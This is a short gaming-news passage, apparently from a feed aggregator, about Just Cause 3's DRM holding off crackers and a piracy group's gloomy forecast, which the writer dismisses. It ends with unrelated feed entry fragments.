My eyebrow’s raised so high that it’s knocking plaster off the ceiling, but it’s worth sharing this oddity as a talking point if nothing else. It seems Just Cause 3 [official site]’s DRM is still presenting stiff competition to crackers over a month on from release, prompting one pirate collective to predict that we are in the game piracy end times. “According to current trends in the development of encryption technology, in two years time I’m afraid there will be no free games to play in the world.”

Obviously that’s garbage, both because people willingly make tons of free games and because many paid games choose not to include DRM at all, but maybe DRM really has become a new force to be reckoned with.

06 Jan 10:00

Fixing a bug during the deploy

by sharhalakis

by @uaiHebert